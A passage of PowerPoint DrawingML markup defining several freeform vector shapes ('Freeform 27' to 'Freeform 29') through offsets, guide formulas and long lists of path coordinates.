                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="331"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="315" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="284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4" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3303588" y="1625600"/>
                <a:ext cx="206375" cy="242888"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 111 w 574"/>
                  <a:gd name="T1" fmla="*/ 0 h 673"/>
                  <a:gd name="T2" fmla="*/ 573 w 574"/>
                  <a:gd name="T3" fmla="*/ 582 h 673"/>
                  <a:gd name="T4" fmla="*/ 462 w 574"/>
                  <a:gd name="T5" fmla="*/ 672 h 673"/>
                  <a:gd name="T6" fmla="*/ 0 w 574"/>
                  <a:gd name="T7" fmla="*/ 89 h 673"/>
                  <a:gd name="T8" fmla="*/ 111 w 574"/>
                  <a:gd name="T9" fmla="*/ 0 h 6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4" h="673">
                    <a:moveTo>
                      <a:pt x="111" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="573" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111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5" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3479800" y="1473200"/>
                <a:ext cx="244475" cy="271463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 678"/>
                  <a:gd name="T1" fmla="*/ 593 h 752"/>
                  <a:gd name="T2" fmla="*/ 409 w 678"/>
                  <a:gd name="T3" fmla="*/ 614 h 752"/>
                  <a:gd name="T4" fmla="*/ 446 w 678"/>
                  <a:gd name="T5" fmla="*/ 620 h 752"/>
                  <a:gd name="T6" fmla="*/ 488 w 678"/>
                  <a:gd name="T7" fmla="*/ 599 h 752"/>
                  <a:gd name="T8" fmla="*/ 530 w 678"/>
                  <a:gd name="T9" fmla="*/ 546 h 752"/>
                  <a:gd name="T10" fmla="*/ 530 w 678"/>
                  <a:gd name="T11" fmla="*/ 510 h 752"/>
                  <a:gd name="T12" fmla="*/ 514 w 678"/>
                  <a:gd name="T13" fmla="*/ 473 h 752"/>
                  <a:gd name="T14" fmla="*/ 482 w 678"/>
                  <a:gd name="T15" fmla="*/ 441 h 752"/>
                  <a:gd name="T16" fmla="*/ 446 w 678"/>
                  <a:gd name="T17" fmla="*/ 426 h 752"/>
                  <a:gd name="T18" fmla="*/ 398 w 678"/>
                  <a:gd name="T19" fmla="*/ 426 h 752"/>
                  <a:gd name="T20" fmla="*/ 283 w 678"/>
                  <a:gd name="T21" fmla="*/ 452 h 752"/>
                  <a:gd name="T22" fmla="*/ 199 w 678"/>
                  <a:gd name="T23" fmla="*/ 457 h 752"/>
                  <a:gd name="T24" fmla="*/ 131 w 678"/>
                  <a:gd name="T25" fmla="*/ 441 h 752"/>
                  <a:gd name="T26" fmla="*/ 73 w 678"/>
                  <a:gd name="T27" fmla="*/ 394 h 752"/>
                  <a:gd name="T28" fmla="*/ 20 w 678"/>
                  <a:gd name="T29" fmla="*/ 316 h 752"/>
                  <a:gd name="T30" fmla="*/ 10 w 678"/>
                  <a:gd name="T31" fmla="*/ 189 h 752"/>
                  <a:gd name="T32" fmla="*/ 47 w 678"/>
                  <a:gd name="T33" fmla="*/ 116 h 752"/>
                  <a:gd name="T34" fmla="*/ 120 w 678"/>
                  <a:gd name="T35" fmla="*/ 52 h 752"/>
                  <a:gd name="T36" fmla="*/ 199 w 678"/>
                  <a:gd name="T37" fmla="*/ 11 h 752"/>
                  <a:gd name="T38" fmla="*/ 283 w 678"/>
                  <a:gd name="T39" fmla="*/ 0 h 752"/>
                  <a:gd name="T40" fmla="*/ 357 w 678"/>
                  <a:gd name="T41" fmla="*/ 26 h 752"/>
                  <a:gd name="T42" fmla="*/ 430 w 678"/>
                  <a:gd name="T43" fmla="*/ 105 h 752"/>
                  <a:gd name="T44" fmla="*/ 283 w 678"/>
                  <a:gd name="T45" fmla="*/ 152 h 752"/>
                  <a:gd name="T46" fmla="*/ 251 w 678"/>
                  <a:gd name="T47" fmla="*/ 132 h 752"/>
                  <a:gd name="T48" fmla="*/ 199 w 678"/>
                  <a:gd name="T49" fmla="*/ 132 h 752"/>
                  <a:gd name="T50" fmla="*/ 167 w 678"/>
                  <a:gd name="T51" fmla="*/ 152 h 752"/>
                  <a:gd name="T52" fmla="*/ 147 w 678"/>
                  <a:gd name="T53" fmla="*/ 184 h 752"/>
                  <a:gd name="T54" fmla="*/ 141 w 678"/>
                  <a:gd name="T55" fmla="*/ 216 h 752"/>
                  <a:gd name="T56" fmla="*/ 162 w 678"/>
                  <a:gd name="T57" fmla="*/ 257 h 752"/>
                  <a:gd name="T58" fmla="*/ 204 w 678"/>
                  <a:gd name="T59" fmla="*/ 299 h 752"/>
                  <a:gd name="T60" fmla="*/ 236 w 678"/>
                  <a:gd name="T61" fmla="*/ 305 h 752"/>
                  <a:gd name="T62" fmla="*/ 404 w 678"/>
                  <a:gd name="T63" fmla="*/ 279 h 752"/>
                  <a:gd name="T64" fmla="*/ 482 w 678"/>
                  <a:gd name="T65" fmla="*/ 273 h 752"/>
                  <a:gd name="T66" fmla="*/ 545 w 678"/>
                  <a:gd name="T67" fmla="*/ 284 h 752"/>
                  <a:gd name="T68" fmla="*/ 593 w 678"/>
                  <a:gd name="T69" fmla="*/ 316 h 752"/>
                  <a:gd name="T70" fmla="*/ 629 w 678"/>
                  <a:gd name="T71" fmla="*/ 363 h 752"/>
                  <a:gd name="T72" fmla="*/ 677 w 678"/>
                  <a:gd name="T73" fmla="*/ 504 h 752"/>
                  <a:gd name="T74" fmla="*/ 651 w 678"/>
                  <a:gd name="T75" fmla="*/ 583 h 752"/>
                  <a:gd name="T76" fmla="*/ 540 w 678"/>
                  <a:gd name="T77" fmla="*/ 693 h 752"/>
                  <a:gd name="T78" fmla="*/ 441 w 678"/>
                  <a:gd name="T79" fmla="*/ 740 h 752"/>
                  <a:gd name="T80" fmla="*/ 357 w 678"/>
                  <a:gd name="T81" fmla="*/ 746 h 752"/>
                  <a:gd name="T82" fmla="*/ 251 w 678"/>
                  <a:gd name="T83" fmla="*/ 683 h 752"/>
                  <a:gd name="T84" fmla="*/ 331 w 678"/>
                  <a:gd name="T85" fmla="*/ 541 h 7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678" h="752">
                    <a:moveTo>
                      <a:pt x="346" y="557"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="346" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="557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" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3689350" y="1428750"/>
                <a:ext cx="184150" cy="211138"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 226 w 511"/>
                  <a:gd name="T1" fmla="*/ 384 h 585"/>
                  <a:gd name="T2" fmla="*/ 252 w 511"/>
                  <a:gd name="T3" fmla="*/ 426 h 585"/>
                  <a:gd name="T4" fmla="*/ 284 w 511"/>
                  <a:gd name="T5" fmla="*/ 457 h 585"/>
                  <a:gd name="T6" fmla="*/ 315 w 511"/>
                  <a:gd name="T7" fmla="*/ 473 h 585"/>
                  <a:gd name="T8" fmla="*/ 331 w 511"/>
                  <a:gd name="T9" fmla="*/ 473 h 585"/>
                  <a:gd name="T10" fmla="*/ 347 w 511"/>
                  <a:gd name="T11" fmla="*/ 463 h 585"/>
                  <a:gd name="T12" fmla="*/ 373 w 511"/>
                  <a:gd name="T13" fmla="*/ 441 h 585"/>
                  <a:gd name="T14" fmla="*/ 384 w 511"/>
                  <a:gd name="T15" fmla="*/ 415 h 585"/>
                  <a:gd name="T16" fmla="*/ 378 w 511"/>
                  <a:gd name="T17" fmla="*/ 378 h 585"/>
                  <a:gd name="T18" fmla="*/ 478 w 511"/>
                  <a:gd name="T19" fmla="*/ 273 h 585"/>
                  <a:gd name="T20" fmla="*/ 494 w 511"/>
                  <a:gd name="T21" fmla="*/ 316 h 585"/>
                  <a:gd name="T22" fmla="*/ 510 w 511"/>
                  <a:gd name="T23" fmla="*/ 394 h 585"/>
                  <a:gd name="T24" fmla="*/ 504 w 511"/>
                  <a:gd name="T25" fmla="*/ 426 h 585"/>
                  <a:gd name="T26" fmla="*/ 467 w 511"/>
                  <a:gd name="T27" fmla="*/ 494 h 585"/>
                  <a:gd name="T28" fmla="*/ 399 w 511"/>
                  <a:gd name="T29" fmla="*/ 547 h 585"/>
                  <a:gd name="T30" fmla="*/ 363 w 511"/>
                  <a:gd name="T31" fmla="*/ 562 h 585"/>
                  <a:gd name="T32" fmla="*/ 305 w 511"/>
                  <a:gd name="T33" fmla="*/ 584 h 585"/>
                  <a:gd name="T34" fmla="*/ 279 w 511"/>
                  <a:gd name="T35" fmla="*/ 584 h 585"/>
                  <a:gd name="T36" fmla="*/ 231 w 511"/>
                  <a:gd name="T37" fmla="*/ 573 h 585"/>
                  <a:gd name="T38" fmla="*/ 190 w 511"/>
                  <a:gd name="T39" fmla="*/ 557 h 585"/>
                  <a:gd name="T40" fmla="*/ 153 w 511"/>
                  <a:gd name="T41" fmla="*/ 525 h 585"/>
                  <a:gd name="T42" fmla="*/ 121 w 511"/>
                  <a:gd name="T43" fmla="*/ 484 h 585"/>
                  <a:gd name="T44" fmla="*/ 63 w 511"/>
                  <a:gd name="T45" fmla="*/ 394 h 585"/>
                  <a:gd name="T46" fmla="*/ 16 w 511"/>
                  <a:gd name="T47" fmla="*/ 294 h 585"/>
                  <a:gd name="T48" fmla="*/ 6 w 511"/>
                  <a:gd name="T49" fmla="*/ 247 h 585"/>
                  <a:gd name="T50" fmla="*/ 0 w 511"/>
                  <a:gd name="T51" fmla="*/ 200 h 585"/>
                  <a:gd name="T52" fmla="*/ 6 w 511"/>
                  <a:gd name="T53" fmla="*/ 153 h 585"/>
                  <a:gd name="T54" fmla="*/ 26 w 511"/>
                  <a:gd name="T55" fmla="*/ 111 h 585"/>
                  <a:gd name="T56" fmla="*/ 43 w 511"/>
                  <a:gd name="T57" fmla="*/ 90 h 585"/>
                  <a:gd name="T58" fmla="*/ 90 w 511"/>
                  <a:gd name="T59" fmla="*/ 53 h 585"/>
                  <a:gd name="T60" fmla="*/ 116 w 511"/>
                  <a:gd name="T61" fmla="*/ 32 h 585"/>
                  <a:gd name="T62" fmla="*/ 194 w 511"/>
                  <a:gd name="T63" fmla="*/ 0 h 585"/>
                  <a:gd name="T64" fmla="*/ 216 w 511"/>
                  <a:gd name="T65" fmla="*/ 0 h 585"/>
                  <a:gd name="T66" fmla="*/ 300 w 511"/>
                  <a:gd name="T67" fmla="*/ 22 h 585"/>
                  <a:gd name="T68" fmla="*/ 337 w 511"/>
                  <a:gd name="T69" fmla="*/ 48 h 585"/>
                  <a:gd name="T70" fmla="*/ 367 w 511"/>
                  <a:gd name="T71" fmla="*/ 84 h 585"/>
                  <a:gd name="T72" fmla="*/ 436 w 511"/>
                  <a:gd name="T73" fmla="*/ 179 h 585"/>
                  <a:gd name="T74" fmla="*/ 200 w 511"/>
                  <a:gd name="T75" fmla="*/ 347 h 585"/>
                  <a:gd name="T76" fmla="*/ 257 w 511"/>
                  <a:gd name="T77" fmla="*/ 153 h 585"/>
                  <a:gd name="T78" fmla="*/ 242 w 511"/>
                  <a:gd name="T79" fmla="*/ 137 h 585"/>
                  <a:gd name="T80" fmla="*/ 226 w 511"/>
                  <a:gd name="T81" fmla="*/ 121 h 585"/>
                  <a:gd name="T82" fmla="*/ 194 w 511"/>
                  <a:gd name="T83" fmla="*/ 111 h 585"/>
                  <a:gd name="T84" fmla="*/ 179 w 511"/>
                  <a:gd name="T85" fmla="*/ 111 h 585"/>
                  <a:gd name="T86" fmla="*/ 158 w 511"/>
                  <a:gd name="T87" fmla="*/ 121 h 585"/>
                  <a:gd name="T88" fmla="*/ 131 w 511"/>
                  <a:gd name="T89" fmla="*/ 147 h 585"/>
                  <a:gd name="T90" fmla="*/ 126 w 511"/>
                  <a:gd name="T91" fmla="*/ 163 h 585"/>
                  <a:gd name="T92" fmla="*/ 126 w 511"/>
                  <a:gd name="T93" fmla="*/ 179 h 585"/>
                  <a:gd name="T94" fmla="*/ 131 w 511"/>
                  <a:gd name="T95" fmla="*/ 216 h 585"/>
                  <a:gd name="T96" fmla="*/ 163 w 511"/>
                  <a:gd name="T97" fmla="*/ 273 h 585"/>
                  <a:gd name="T98" fmla="*/ 289 w 511"/>
                  <a:gd name="T99" fmla="*/ 200 h 5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11" h="585">
                    <a:moveTo>
                      <a:pt x="226" y="384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="557"/>
                    </a:lnTo>
